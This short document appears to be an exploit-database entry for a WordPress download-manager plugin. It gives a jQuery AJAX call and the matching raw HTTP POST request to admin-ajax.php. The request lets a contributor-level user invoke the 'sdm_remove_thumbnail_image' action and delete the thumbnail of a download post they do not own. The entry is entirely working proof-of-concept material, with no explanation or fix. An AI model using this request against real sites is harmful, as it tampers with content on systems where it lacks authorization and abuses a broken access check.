## https://sploitus.com/exploit?id=WPEX-ID:1FDA1356-77D8-4E77-9EE6-8F9CEEB3D380
```javascript
jQuery.post(ajaxurl, {
    action: "sdm_remove_thumbnail_image",
    post_id_del: 613 // not owned by the user
});
```

```http
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 49
Connection: close
Cookie: [contrib+ not owning the download to remove the thumbnail from]

action=sdm_remove_thumbnail_image&post_id_del=613
```